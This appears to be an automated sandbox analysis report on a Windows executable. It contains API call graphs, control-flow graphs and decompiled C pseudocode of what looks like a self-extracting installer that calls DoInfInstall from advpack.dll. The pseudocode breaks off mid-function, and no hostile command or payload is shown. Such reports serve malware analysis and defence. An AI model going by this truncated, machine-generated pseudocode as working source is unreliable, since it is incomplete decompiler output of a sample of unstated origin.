2892 ac48f5 CreateFileA 2891->2892 2893 ac4917 2891->2893 2892->2886 2893->2892 2894 ac4962 CharNextA 2893->2894 2895 ac4953 CreateDirectoryA 2893->2895 2894->2893 2895->2894 2897 ac255b 2896->2897 2898 ac2510 2896->2898 2900 ac6ce0 4 API calls 2897->2900 2899 ac658a CharPrevA 2898->2899 2901 ac2522 WritePrivateProfileStringA _lopen 2899->2901 2902 ac2569 2900->2902 2901->2897 2903 ac2548 _llseek _lclose 2901->2903 2902->2658 2903->2897 2905 ac1b25 2904->2905 3009 ac1a84 2905->3009 2907 ac1b57 2908 ac658a CharPrevA 2907->2908 2910 ac1b8c 2907->2910 2908->2910 2909 ac66c8 2 API calls 2911 ac1bd1 2909->2911 2910->2909 2912 ac1bd9 CompareStringA 2911->2912 2913 ac1d73 2911->2913 2912->2913 2914 ac1bf7 GetFileAttributesA 2912->2914 2915 ac66c8 2 API calls 2913->2915 2916 ac1c0d 2914->2916 2917 ac1d53 2914->2917 2918 ac1d7d 2915->2918 2916->2917 2924 ac1a84 2 API calls 2916->2924 2919 ac1d64 2917->2919 2920 ac1df8 LocalAlloc 2918->2920 2921 ac1d81 CompareStringA 2918->2921 2922 ac44b9 20 API calls 2919->2922 2920->2919 2923 ac1e0b GetFileAttributesA 2920->2923 2921->2920 2930 ac1d9b 2921->2930 2925 ac1d6c 2922->2925 2936 ac1e1d 2923->2936 2944 ac1e45 2923->2944 2926 ac1c31 2924->2926 2929 ac6ce0 4 API calls 2925->2929 2927 ac1c50 LocalAlloc 2926->2927 2931 ac1a84 2 API calls 2926->2931 2927->2919 2928 ac1c67 GetPrivateProfileIntA GetPrivateProfileStringA 2927->2928 2938 ac1cf8 2928->2938 2942 ac1cc2 2928->2942 2935 ac1ea1 2929->2935 2930->2930 2932 ac1dbe LocalAlloc 2930->2932 2931->2927 2932->2919 2937 ac1de1 2932->2937 2935->2663 2936->2944 2939 ac171e _vsnprintf 2937->2939 2940 ac1d09 GetShortPathNameA 2938->2940 2941 ac1d23 2938->2941 2939->2942 2940->2941 2943 ac171e _vsnprintf 2941->2943 2942->2925 2943->2942 3015 ac2aac 2944->3015 2946 ac209a 2945->2946 2954 ac2256 2945->2954 2948 ac171e _vsnprintf 2946->2948 2951 ac20dc 2946->2951 2947 ac6ce0 4 API calls 2949 ac2263 2947->2949 2950 ac20af RegQueryValueExA 2948->2950 2949->2663 2950->2946 2950->2951 2952 ac20fb GetSystemDirectoryA 2951->2952 2953 ac20e4 RegCloseKey 2951->2953 2955 ac658a CharPrevA 2952->2955 2953->2954 2954->2947 2956 ac211b LoadLibraryA 2955->2956 2957 ac212e GetProcAddress FreeLibrary 2956->2957 2958 ac2179 GetModuleFileNameA 2956->2958 2957->2958 2959 ac214e GetSystemDirectoryA 2957->2959 2960 ac21de RegCloseKey 2958->2960 2963 ac2177 2958->2963 2961 ac2165 2959->2961 2959->2963 2960->2954 2962 ac658a CharPrevA 2961->2962 2962->2963 2963->2963 2964 ac21b7 LocalAlloc 2963->2964 2965 ac21ec 2964->2965 2966 ac21cd 2964->2966 2968 ac171e _vsnprintf 2965->2968 2967 ac44b9 20 API calls 2966->2967 2967->2960 2969 ac2218 RegSetValueExA RegCloseKey LocalFree 2968->2969 2969->2954 2972 ac4016 CreateProcessA 2971->2972 2982 ac4106 2971->2982 2973 ac40c4 2972->2973 2974 ac4041 WaitForSingleObject GetExitCodeProcess 2972->2974 2976 ac6285 GetLastError 2973->2976 2984 ac4070 2974->2984 2975 ac6ce0 4 API calls 2977 ac4117 2975->2977 2978 ac40c9 GetLastError FormatMessageA 2976->2978 2977->2663 2981 ac44b9 20 API calls 2978->2981 2980 ac4096 CloseHandle CloseHandle 2980->2982 2983 ac40ba 2980->2983 2981->2982 2982->2975 2983->2982 3042 ac411b 2984->3042 2986 ac64c2 2985->2986 2987 ac658a CharPrevA 2986->2987 2988 ac64d8 GetFileAttributesA 2987->2988 2989 ac64ea 2988->2989 2990 ac6501 LoadLibraryA 2988->2990 2989->2990 2992 ac64ee LoadLibraryExA 2989->2992 2991 ac6508 2990->2991 2993 ac6ce0 4 API calls 2991->2993 2992->2991 2994 ac6513 2993->2994 2994->2696 2996 ac2289 RegOpenKeyExA 2995->2996 2997 ac2381 2995->2997 2996->2997 2999 ac22b1 RegQueryValueExA 2996->2999 2998 ac6ce0 4 API calls 2997->2998 3000 ac238c 2998->3000 3001 ac2374 RegCloseKey 2999->3001 3002 ac22e6 memset GetSystemDirectoryA 2999->3002 3000->2669 3001->2997 3003 ac230f 3002->3003 3004 ac2321 3002->3004 3005 ac658a CharPrevA 3003->3005 3006 ac171e _vsnprintf 3004->3006 3005->3004 3007 ac233f RegSetValueExA 3006->3007 3007->3001 3010 ac1a9a 3009->3010 3012 ac1aaf 3010->3012 3013 ac1aba 3010->3013 3028 ac667f 3010->3028 3012->3013 3014 ac667f 2 API calls 3012->3014 3013->2907 3014->3012 3016 ac2be6 3015->3016 3017 ac2ad4 GetModuleFileNameA 3015->3017 3018 ac6ce0 4 API calls 3016->3018 3027 ac2b02 3017->3027 3019 ac2bf5 3018->3019 3019->2925 3020 ac2af1 IsDBCSLeadByte 3020->3027 3021 ac2bca CharNextA 3024 ac2bd3 CharNextA 3021->3024 3022 ac2b11 CharNextA CharUpperA 3023 ac2b8d CharUpperA 3022->3023 3022->3027 3023->3027 3024->3027 3026 ac2b43 CharPrevA 3026->3027 3027->3016 3027->3020 3027->3021 3027->3022 3027->3024 3027->3026 3033 ac65e8 3027->3033 3029 ac6689 3028->3029 3030 ac66a5 3029->3030 3031 ac6648 IsDBCSLeadByte 3029->3031 3032 ac6697 CharNextA 3029->3032 3030->3010 3031->3029 3032->3029 3034 ac65f4 3033->3034 3034->3034 3035 ac65fb CharPrevA 3034->3035 3036 ac6611 CharPrevA 3035->3036 3037 ac661e 3036->3037 3038 ac660b 3036->3038 3039 ac663d 3037->3039 3040 ac6634 CharNextA 3037->3040 3041 ac6627 CharPrevA 3037->3041 3038->3036 3038->3037 3039->3027 3040->3039 3041->3039 3041->3040 3043 ac4132 3042->3043 3045 ac412a 3042->3045 3046 ac1ea7 3043->3046 3045->2980 3047 ac1ed3 3046->3047 3048 ac1eba 3046->3048 3047->3045 3049 ac256d 15 API calls 3048->3049 3049->3047 3051 ac2026 3050->3051 3052 ac1ff0 RegOpenKeyExA 3050->3052 3051->2319 3052->3051 3053 ac200f RegDeleteValueA RegCloseKey 3052->3053 3053->3051 3120 ac19e0 3121 ac1a24 GetDesktopWindow 3120->3121 3122 ac1a03 3120->3122 3129 ac43d0 6 API calls 3121->3129 3124 ac1a20 3122->3124 3126 ac1a16 EndDialog 3122->3126 3127 ac6ce0 4 API calls 3124->3127 3126->3124 3128 ac1a7e 3127->3128 3130 ac4463 SetWindowPos 3129->3130 3132 ac6ce0 4 API calls 3130->3132 3133 ac1a33 LoadStringA SetDlgItemTextA MessageBeep 3132->3133 3133->3124 3134 ac6a20 __getmainargs 3135 ac69b0 3136 ac69b5 3135->3136 3144 ac6fbe GetModuleHandleW 3136->3144 3138 ac69c1 __set_app_type __p__fmode __p__commode 3139 ac69f9 3138->3139 3140 ac6a0e 3139->3140 3141 ac6a02 __setusermatherr 3139->3141 3146 ac71ef _controlfp 3140->3146 3141->3140 3143 ac6a13 3145 ac6fcf 3144->3145 3145->3138 3146->3143 3147 ac34f0 3148 ac3504 3147->3148 3149 ac35b8 3147->3149 3148->3149 3150 ac35be GetDesktopWindow 3148->3150 3151 ac351b 3148->3151 3152 ac3671 EndDialog 3149->3152 3153 ac3526 3149->3153 3154 ac43d0 11 API calls 3150->3154 3155 ac354f 3151->3155 3156 ac351f 3151->3156 3152->3153 3157 ac35d6 3154->3157 3155->3153 3159 ac3559 ResetEvent 3155->3159 3156->3153 3158 ac352d TerminateThread EndDialog 3156->3158 3161 ac361d SetWindowTextA CreateThread 3157->3161 3162 ac35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3157->3162 3158->3153 3160 ac44b9 20 API calls 3159->3160 3163 ac3581 3160->3163 3161->3153 3164 ac3646 3161->3164 3162->3161 3165 ac359b SetEvent 3163->3165 3167 ac358a SetEvent 3163->3167 3166 ac44b9 20 API calls 3164->3166 3168 ac3680 4 API calls 3165->3168 3166->3149 3167->3153 3168->3149 3169 ac6ef0 3170 ac6f2d 3169->3170 3172 ac6f02 3169->3172 3171 ac6f27 ?terminate@ 3171->3170 3172->3170 3172->3171 3173 ac7270 _except_handler4_common 3054 ac4cc0 GlobalFree 3055 ac6f40 SetUnhandledExceptionFilter 3174 ac4bc0 3176 ac4c05 3174->3176 3177 ac4bd7 3174->3177 3175 ac4c1b SetFilePointer 3175->3177 3176->3175 3176->3177 3178 ac30c0 3179 ac30de CallWindowProcA 3178->3179 3180 ac30ce 3178->3180 3181 ac30da 3179->3181 3180->3179 3180->3181 3182 ac63c0 3183 ac6407 3182->3183 3184 ac658a CharPrevA 3183->3184 3185 ac6415 CreateFileA 3184->3185 3186 ac6448 WriteFile 3185->3186 3187 ac643a 3185->3187 3188 ac6465 CloseHandle 3186->3188 3190 ac6ce0 4 API calls 3187->3190 3188->3187 3191 ac648f 3190->3191 3192 ac3100 3193 ac31b0 3192->3193 3194 ac3111 3192->3194 3195 ac31b9 SendDlgItemMessageA 3193->3195 3198 ac3141 3193->3198 3196 ac3149 GetDesktopWindow 3194->3196 3200 ac311d 3194->3200 3195->3198 3199 ac43d0 11 API calls 3196->3199 3197 ac3138 EndDialog 3197->3198 3201 ac315d 6 API calls 3199->3201 3200->3197 3200->3198 3201->3198 3202 ac4200 3203 ac421e 3202->3203 3204 ac420b SendMessageA 3202->3204 3204->3203 3205 ac6c03 3206 ac6c1e 3205->3206 3207 ac6c17 _exit 3205->3207 3208 ac6c27 _cexit 3206->3208 3209 ac6c32 3206->3209 3207->3206 3208->3209 3056 ac4cd0 3057 ac4d0b 3056->3057 3058 ac4cf4 3056->3058 3059 ac4d02 3057->3059 3062 ac4dcb 3057->3062 3065 ac4d25 3057->3065 3058->3059 3060 ac4b60 FindCloseChangeNotification 3058->3060 3061 ac6ce0 4 API calls 3059->3061 3060->3059 3064 ac4e95 3061->3064 3063 ac4dd4 SetDlgItemTextA 3062->3063 3066 ac4de3 3062->3066 3063->3066 3065->3059 3079 ac4c37 3065->3079 3066->3059 3084 ac476d 3066->3084 3069 ac4e38 3069->3059 3071 ac4980 25 API calls 3069->3071 3073 ac4e56 3071->3073 3072 ac4b60 FindCloseChangeNotification 3074 ac4d99 SetFileAttributesA 3072->3074 3073->3059 3075 ac4e64 3073->3075 3074->3059 3093 ac47e0 LocalAlloc 3075->3093 3078 ac4e6f 3078->3059 3080 ac4c4c DosDateTimeToFileTime 3079->3080 3081 ac4c88 3079->3081 3080->3081 3082 ac4c5e LocalFileTimeToFileTime 3080->3082 3081->3059 3081->3072 3082->3081 3083 ac4c70 SetFileTime 3082->3083 3083->3081 3102 ac66ae GetFileAttributesA 3084->3102 3086 ac477b 3086->3069 3087 ac47cc SetFileAttributesA 3088 ac47db 3087->3088 3088->3069 3090 ac6517 24 API calls 3091 ac47b1 3090->3091 3091->3087 3091->3088 3092 ac47c2 3091->3092 3092->3087 3094 ac480f LocalAlloc 3093->3094 3095 ac47f6 3093->3095 3098 ac480b 3094->3098 3099 ac4831 3094->3099 3096 ac44b9 20 API calls 3095->3096 3096->3098 3098->3078 3100 ac44b9 20 API calls 3099->3100 3101 ac4846 LocalFree 3100->3101 3101->3098 3103 ac4777 3102->3103 3103->3086 3103->3087 3103->3090 3104 ac4ad0 3112 ac3680 3104->3112 3107 ac4aee WriteFile 3109 ac4b0f 3107->3109 3110 ac4b14 3107->3110 3108 ac4ae9 3110->3109 3111 ac4b3b SendDlgItemMessageA 3110->3111 3111->3109 3113 ac3691 MsgWaitForMultipleObjects 3112->3113 3114 ac36e8 3113->3114 3115 ac36a9 PeekMessageA 3113->3115 3114->3107 3114->3108 3115->3113 3116 ac36bc 3115->3116 3116->3113 3116->3114 3117 ac36c7 DispatchMessageA 3116->3117 3118 ac36d1 PeekMessageA 3116->3118 3117->3118 3118->3116 3210 ac3210 3211 ac3227 3210->3211 3235 ac328e EndDialog 3210->3235 3212 ac3235 3211->3212 3213 ac33e2 GetDesktopWindow 3211->3213 3217 ac324c 3212->3217 3218 ac32dd GetDlgItemTextA 3212->3218 3242 ac3239 3212->3242 3215 ac43d0 11 API calls 3213->3215 3216 ac33f1 SetWindowTextA SendDlgItemMessageA 3215->3216 3219 ac341f GetDlgItem EnableWindow 3216->3219 3216->3242 3221 ac32c5 EndDialog 3217->3221 3222 ac3251 3217->3222 3220 ac3366 3218->3220 3227 ac32fc 3218->3227 3219->3242 3224 ac44b9 20 API calls 3220->3224 3221->3242 3223 ac325c LoadStringA 3222->3223 3222->3242 3225 ac327b 3223->3225 3226 ac3294 3223->3226 3224->3242 3231 ac44b9 20 API calls 3225->3231 3248 ac4224 LoadLibraryA 3226->3248 3227->3220 3230 ac3331 GetFileAttributesA 3227->3230 3233 ac337c 3230->3233 3234 ac333f 3230->3234 3231->3235 3232 ac32a5 SetDlgItemTextA 3232->3225 3232->3242 3236 ac658a CharPrevA 3233->3236 3237 ac44b9 20 API calls 3234->3237 3235->3242 3238 ac338d 3236->3238 3239 ac3351 3237->3239 3240 ac58c8 27 API calls 3238->3240 3241 ac335a CreateDirectoryA 3239->3241 3239->3242 3243 ac3394 3240->3243 3241->3220 3241->3233 3243->3220 3244 ac33a4 3243->3244 3245 ac33c7 EndDialog 3244->3245 3246 ac597d 34 API calls 3244->3246 3245->3242 3247 ac33c3 3246->3247 3247->3242 3247->3245 3249 ac4246 GetProcAddress 3248->3249 3252 ac43b2 3248->3252 3250 ac425d GetProcAddress 3249->3250 3251 ac43a4 FreeLibrary 3249->3251 3250->3251 3253 ac4274 GetProcAddress 3250->3253 3251->3252 3254 ac44b9 20 API calls 3252->3254 3253->3251 3255 ac428b 3253->3255 3256 ac329d 3254->3256 3257 ac4295 GetTempPathA 3255->3257 3262 ac42e1 3255->3262 3256->3232 3256->3242 3258 ac42ad 3257->3258 3258->3258 3259 ac42b4 CharPrevA 3258->3259 3260 ac42d0 CharPrevA 3259->3260 3259->3262 3260->3262 3261 ac4390 FreeLibrary 3261->3256 3262->3261 3263 ac4a50 3264 ac4a9f ReadFile 3263->3264 3265 ac4a66 3263->3265 3267 ac4abb 3264->3267 3266 ac4a82 memcpy 3265->3266 3265->3267 3266->3267 3268 ac3450 3269 ac345e 3268->3269 3270 ac34d3 EndDialog 3268->3270 3272 ac349a GetDesktopWindow 3269->3272 3276 ac3465 3269->3276 3271 ac346a 3270->3271 3273 ac43d0 11 API calls 3272->3273 3274 ac34ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3273->3274 3274->3271 3275 ac348c EndDialog 3275->3271 3276->3271 3276->3275

                                                Callgraph

                                                • Executed
                                                • Not Executed
                                                • Opacity -> Relevance
                                                • Disassembly available
                                                callgraph 0 Function_00AC2AAC 26 Function_00AC1680 0->26 42 Function_00AC65E8 0->42 47 Function_00AC6CE0 0->47 61 Function_00AC17C8 0->61 1 Function_00AC66AE 2 Function_00AC2CAA 11 Function_00AC18A3 2->11 13 Function_00AC44B9 2->13 17 Function_00AC468F 2->17 28 Function_00AC5C9E 2->28 32 Function_00AC2390 2->32 35 Function_00AC36EE 2->35 2->47 93 Function_00AC6517 2->93 3 Function_00AC6FA5 112 Function_00AC724D 3->112 4 Function_00AC1EA7 96 Function_00AC256D 4->96 5 Function_00AC55A0 5->13 5->17 19 Function_00AC658A 5->19 22 Function_00AC6285 5->22 27 Function_00AC1781 5->27 5->47 79 Function_00AC2630 5->79 5->93 100 Function_00AC5467 5->100 106 Function_00AC597D 5->106 119 Function_00AC6952 5->119 6 Function_00AC4CA0 7 Function_00AC53A1 7->19 7->26 7->47 89 Function_00AC171E 7->89 8 Function_00AC6FA1 9 Function_00AC3BA2 9->13 9->17 9->22 9->27 31 Function_00AC6495 9->31 37 Function_00AC3FEF 9->37 40 Function_00AC1AE8 9->40 9->47 70 Function_00AC202A 9->70 101 Function_00AC2267 9->101 10 Function_00AC72A2 36 Function_00AC17EE 11->36 11->47 12 Function_00AC6FBE 115 Function_00AC6F54 12->115 13->26 13->47 62 Function_00AC67C9 13->62 13->89 90 Function_00AC681F 13->90 14 Function_00AC52B6 14->27 14->32 14->42 14->47 51 Function_00AC1FE1 14->51 15 Function_00AC69B0 15->12 38 Function_00AC71EF 15->38 84 Function_00AC7000 15->84 110 Function_00AC6C70 15->110 16 Function_00AC16B3 16->27 18 Function_00AC2A89 19->16 20 Function_00AC268B 20->13 20->47 20->89 21 Function_00AC1A84 107 Function_00AC667F 21->107 23 Function_00AC6380 24 Function_00AC3680 25 Function_00AC4980 25->13 108 Function_00AC487A 25->108 26->27 28->13 28->19 28->26 46 Function_00AC31E0 28->46 28->47 60 Function_00AC66C8 28->60 71 Function_00AC6E2A 28->71 92 Function_00AC5C17 28->92 28->107 29 Function_00AC6298 29->47 29->89 30 Function_00AC4E99 30->26 31->19 31->27 31->47 32->16 32->19 32->26 32->32 32->47 33 Function_00AC1F90 33->4 33->13 33->47 34 Function_00AC6793 35->13 35->18 41 Function_00AC28E8 35->41 35->47 35->62 35->90 36->47 37->13 37->22 37->47 91 Function_00AC411B 37->91 39 Function_00AC6BEF 40->0 40->13 40->16 40->19 40->21 40->26 40->27 40->47 40->60 40->89 41->18 111 Function_00AC2773 41->111 43 Function_00AC70EB 44 Function_00AC51E5 44->13 44->17 44->22 45 Function_00AC4FE0 45->13 45->17 52 Function_00AC4EFD 45->52 56 Function_00AC6CF0 47->56 48 Function_00AC24E0 48->19 48->47 49 Function_00AC19E0 49->47 69 Function_00AC43D0 49->69 50 Function_00AC47E0 50->13 50->26 52->25 52->47 102 Function_00AC4B60 52->102 53 Function_00AC70FE 54 Function_00AC66F9 55 Function_00AC2BFB 55->2 55->14 55->33 87 Function_00AC2F1D 55->87 57 Function_00AC34F0 57->13 57->24 57->69 58 Function_00AC6EF0 59 Function_00AC58C8 59->13 59->19 59->22 59->26 113 Function_00AC6648 60->113 62->34 63 Function_00AC4CC0 64 Function_00AC4BC0 65 Function_00AC30C0 66 Function_00AC63C0 66->19 66->27 66->47 67 Function_00AC4AD0 67->24 68 Function_00AC4CD0 68->25 68->30 68->47 68->50 78 Function_00AC4C37 68->78 85 Function_00AC4702 68->85 97 Function_00AC476D 68->97 68->102 69->47 70->13 70->19 70->47 70->89 71->56 72 Function_00AC4224 72->13 72->26 73 Function_00AC3B26 73->29 73->45 73->93 74 Function_00AC7120 75 Function_00AC6A20 76 Function_00AC3A3F 76->13 76->17 76->22 76->93 77 Function_00AC6C3F 79->13 79->47 80 Function_00AC490C 81 Function_00AC7208 82 Function_00AC3100 82->69 83 Function_00AC4200 85->16 85->26 86 Function_00AC6C03 86->112 87->5 87->9 87->13 87->19 87->22 87->44 87->47 87->73 87->76 88 Function_00AC621E 87->88 87->96 98 Function_00AC4169 87->98 99 Function_00AC5164 87->99 88->13 88->22 88->47 88->106 90->47 90->54 91->4 93->13 94 Function_00AC7010 95 Function_00AC3210 95->13 95->19 95->59 95->69 95->72 95->106 96->48 97->1 97->93 98->13 98->17 99->13 99->17 99->29 100->7 100->19 100->22 100->26 100->27 100->47 100->59 100->106 101->19 101->47 101->89 103 Function_00AC6A60 103->55 103->77 103->81 104 Function_00AC7060 103->104 103->112 116 Function_00AC7155 103->116 104->74 104->94 105 Function_00AC6760 106->13 106->20 106->22 106->47 107->113 108->80 109 Function_00AC7270 111->19 111->26 111->27 111->47 114 Function_00AC6F40 115->81 115->112 117 Function_00AC4A50 118 Function_00AC3450 118->69

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 36 ac3ba2-ac3bd9 37 ac3bfd-ac3bff 36->37 38 ac3bdb-ac3bee call ac468f 36->38 40 ac3c03-ac3c28 memset 37->40 44 ac3bf4-ac3bf7 38->44 45 ac3d13-ac3d30 call ac44b9 38->45 42 ac3c2e-ac3c40 call ac468f 40->42 43 ac3d35-ac3d48 call ac1781 40->43 42->45 54 ac3c46-ac3c49 42->54 49 ac3d4d-ac3d52 43->49 44->37 44->45 55 ac3f4d 45->55 52 ac3d9e-ac3db6 call ac1ae8 49->52 53 ac3d54-ac3d6c call ac468f 49->53 52->55 69 ac3dbc-ac3dc2 52->69 53->45 65 ac3d6e-ac3d75 53->65 54->45 57 ac3c4f-ac3c56 54->57 59 ac3f4f-ac3f63 call ac6ce0 55->59 61 ac3c58-ac3c5e 57->61 62 ac3c60-ac3c65 57->62 66 ac3c6e-ac3c73 61->66 67 ac3c75-ac3c7c 62->67 68 ac3c67-ac3c6d 62->68 71 ac3fda-ac3fe1 65->71 72 ac3d7b-ac3d98 CompareStringA 65->72 73 ac3c87-ac3c89 66->73 67->73 76 ac3c7e-ac3c82 67->76 68->66 74 ac3dc4-ac3dce 69->74 75 ac3de6-ac3de8 69->75 80 ac3fe8-ac3fea 71->80 81 ac3fe3 call ac2267 71->81 72->52 72->71 73->49 77 ac3c8f-ac3c98 73->77 74->75 82 ac3dd0-ac3dd7 74->82 78 ac3dee-ac3df5 75->78 79 ac3f0b-ac3f15 call ac3fef 75->79 76->73 84 ac3c9a-ac3c9c 77->84 85 ac3cf1-ac3cf3 77->85 86 ac3fab-ac3fd2 call ac44b9 LocalFree 78->86 87 ac3dfb-ac3dfd 78->87 96 ac3f1a-ac3f1c 79->96 80->59 81->80 82->75 83 ac3dd9-ac3ddb 82->83 83->78 90 ac3ddd-ac3de1 call ac202a 83->90 92 ac3c9e-ac3ca3 84->92 93 ac3ca5-ac3ca7 84->93 85->52 95 ac3cf9-ac3d11 call ac468f 85->95 86->55 87->79 94 ac3e03-ac3e0a 87->94 90->75 101 ac3cb2-ac3cc5 call ac468f 92->101 93->55 102 ac3cad 93->102 94->79 103 ac3e10-ac3e19 call ac6495 94->103 95->45 95->49 97 ac3f1e-ac3f2d LocalFree 96->97 98 ac3f46-ac3f47 LocalFree 96->98 105 ac3fd7-ac3fd9 97->105 106 ac3f33-ac3f3b 97->106 98->55 101->45 112 ac3cc7-ac3ce8 CompareStringA 101->112 102->101 113 ac3e1f-ac3e36 GetProcAddress 103->113 114 ac3f92-ac3fa9 call ac44b9 103->114 105->71 106->40 112->85 115 ac3cea-ac3ced 112->115 116 ac3e3c-ac3e80 113->116 117 ac3f64-ac3f76 call ac44b9 FreeLibrary 113->117 123 ac3f7c-ac3f90 LocalFree call ac6285 114->123 115->85 121 ac3e8b-ac3e94 116->121 122 ac3e82-ac3e87 116->122 117->123 125 ac3e9f-ac3ea2 121->125 126 ac3e96-ac3e9b 121->126 122->121 123->55 127 ac3ead-ac3eb6 125->127 128 ac3ea4-ac3ea9 125->128 126->125 130 ac3eb8-ac3ebd 127->130 131 ac3ec1-ac3ec3 127->131 128->127 130->131 133 ac3ece-ac3eec 131->133 134 ac3ec5-ac3eca 131->134 137 ac3eee-ac3ef3 133->137 138 ac3ef5-ac3efd 133->138 134->133 137->138 139 ac3eff-ac3f09 FreeLibrary 138->139 140 ac3f40 FreeLibrary 138->140 139->97 140->98
                                                C-Code - Quality: 82%
                                                			E00AC3BA2() {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				char _v276;
                                                				char _v280;
                                                				short _v300;
                                                				intOrPtr _v304;
                                                				void _v348;
                                                				char _v352;
                                                				intOrPtr _v356;
                                                				signed int _v360;
                                                				short _v364;
                                                				char* _v368;
                                                				intOrPtr _v372;
                                                				void* _v376;
                                                				intOrPtr _v380;
                                                				char _v384;
                                                				signed int _v388;
                                                				intOrPtr _v392;
                                                				signed int _v396;
                                                				signed int _v400;
                                                				signed int _v404;
                                                				void* _v408;
                                                				void* _v424;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t69;
                                                				signed int _t76;
                                                				void* _t77;
                                                				signed int _t79;
                                                				short _t96;
                                                				signed int _t97;
                                                				intOrPtr _t98;
                                                				signed int _t101;
                                                				signed int _t104;
                                                				signed int _t108;
                                                				int _t112;
                                                				void* _t115;
                                                				signed char _t118;
                                                				void* _t125;
                                                				signed int _t127;
                                                				void* _t128;
                                                				struct HINSTANCE__* _t129;
                                                				void* _t130;
                                                				short _t137;
                                                				char* _t140;
                                                				signed char _t144;
                                                				signed char _t145;
                                                				signed int _t149;
                                                				void* _t150;
                                                				void* _t151;
                                                				signed int _t153;
                                                				void* _t155;
                                                				void* _t156;
                                                				signed int _t157;
                                                				signed int _t162;
                                                				signed int _t164;
                                                				void* _t165;
                                                
                                                				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                				_t69 =  *0xac8004; // 0xc32e3ded
                                                				_v8 = _t69 ^ _t164;
                                                				_t153 = 0;
                                                				 *0xac9124 =  *0xac9124 & 0;
                                                				_t149 = 0;
                                                				_v388 = 0;
                                                				_v384 = 0;
                                                				_t165 =  *0xac8a28 - _t153; // 0x0
                                                				if(_t165 != 0) {
                                                					L3:
                                                					_t127 = 0;
                                                					_v392 = 0;
                                                					while(1) {
                                                						_v400 = _v400 & 0x00000000;
                                                						memset( &_v348, 0, 0x44);
                                                						_t164 = _t164 + 0xc;
                                                						_v348 = 0x44;
                                                						if( *0xac8c42 != 0) {
                                                							goto L26;
                                                						}
                                                						_t146 =  &_v396;
                                                						_t115 = E00AC468F("SHOWWINDOW",  &_v396, 4);
                                                						if(_t115 == 0 || _t115 > 4) {
                                                							L25:
                                                							_t146 = 0x4b1;
                                                							E00AC44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                							 *0xac9124 = 0x80070714;
                                                							goto L62;
                                                						} else {
                                                							if(_v396 != 1) {
                                                								__eflags = _v396 - 2;
                                                								if(_v396 != 2) {
                                                									_t137 = 3;
                                                									__eflags = _v396 - _t137;
                                                									if(_v396 == _t137) {
                                                										_v304 = 1;
                                                										_v300 = _t137;
                                                									}
                                                									goto L14;
                                                								}
                                                								_push(6);
                                                								_v304 = 1;
                                                								_pop(0);
                                                								goto L11;
                                                							} else {
                                                								_v304 = 1;
                                                								L11:
                                                								_v300 = 0;
                                                								L14:
                                                								if(_t127 != 0) {
                                                									L27:
                                                									_t155 = 1;
                                                									__eflags = _t127 - 1;
                                                									if(_t127 != 1) {
                                                										L31:
                                                										_t132 =  &_v280;
                                                										_t76 = E00AC1AE8( &_v280,  &_v408,  &_v404); // executed
                                                										__eflags = _t76;
                                                										if(_t76 == 0) {
                                                											L62:
                                                											_t77 = 0;
                                                											L63:
                                                											_pop(_t150);
                                                											_pop(_t156);
                                                											_pop(_t128);
                                                											return E00AC6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                										}
                                                										_t157 = _v404;
                                                										__eflags = _t149;
                                                										if(_t149 != 0) {
                                                											L37:
                                                											__eflags = _t157;
                                                											if(_t157 == 0) {
                                                												L57:
                                                												_t151 = _v408;
                                                												_t146 =  &_v352;
                                                												_t130 = _t151; // executed
                                                												_t79 = E00AC3FEF(_t130,  &_v352); // executed
                                                												__eflags = _t79;
                                                												if(_t79 == 0) {
                                                													L61:
                                                													LocalFree(_t151);
                                                													goto L62;
                                                												}
                                                												L58:
                                                												LocalFree(_t151);
                                                												_t127 = _t127 + 1;
                                                												_v396 = _t127;
                                                												__eflags = _t127 - 2;
                                                												if(_t127 >= 2) {
                                                													_t155 = 1;
                                                													__eflags = 1;
                                                													L69:
                                                													__eflags =  *0xac8580;
                                                													if( *0xac8580 != 0) {
                                                														E00AC2267();
                                                													}
                                                													_t77 = _t155;
                                                													goto L63;
                                                												}
                                                												_t153 = _v392;
                                                												_t149 = _v388;
                                                												continue;
                                                											}
                                                											L38:
                                                											__eflags =  *0xac8180;
                                                											if( *0xac8180 == 0) {
                                                												_t146 = 0x4c7;
                                                												E00AC44B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                												LocalFree(_v424);
                                                												 *0xac9124 = 0x8007042b;
                                                												goto L62;
                                                											}
                                                											__eflags = _t157;
                                                											if(_t157 == 0) {
                                                												goto L57;
                                                											}
                                                											__eflags =  *0xac9a34 & 0x00000004;
                                                											if(__eflags == 0) {
                                                												goto L57;
                                                											}
                                                											_t129 = E00AC6495(_t127, _t132, _t157, __eflags);
                                                											__eflags = _t129;
                                                											if(_t129 == 0) {
                                                												_t146 = 0x4c8;
                                                												E00AC44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                												L65:
                                                												LocalFree(_v408);
                                                												 *0xac9124 = E00AC6285();
                                                												goto L62;
                                                											}
                                                											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                											_v404 = _t146;
                                                											__eflags = _t146;
                                                											if(_t146 == 0) {
                                                												_t146 = 0x4c9;
                                                												__eflags = 0;
                                                												E00AC44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                												FreeLibrary(_t129);
                                                												goto L65;
                                                											}
                                                											__eflags =  *0xac8a30;
                                                											_t151 = _v408;
                                                											_v384 = 0;
                                                											_v368 =  &_v280;
                                                											_t96 =  *0xac9a40; // 0x3
                                                											_v364 = _t96;
                                                											_t97 =  *0xac8a38 & 0x0000ffff;
                                                											_v380 = 0xac9154;
                                                											_v376 = _t151;
                                                											_v372 = 0xac91e4;
                                                											_v360 = _t97;
                                                											if( *0xac8a30 != 0) {
                                                												_t97 = _t97 | 0x00010000;
                                                												__eflags = _t97;
                                                												_v360 = _t97;
                                                											}
                                                											_t144 =  *0xac9a34; // 0x1
                                                											__eflags = _t144 & 0x00000008;
                                                											if((_t144 & 0x00000008) != 0) {
                                                												_t97 = _t97 | 0x00020000;
                                                												__eflags = _t97;
                                                												_v360 = _t97;
                                                											}
                                                											__eflags = _t144 & 0x00000010;
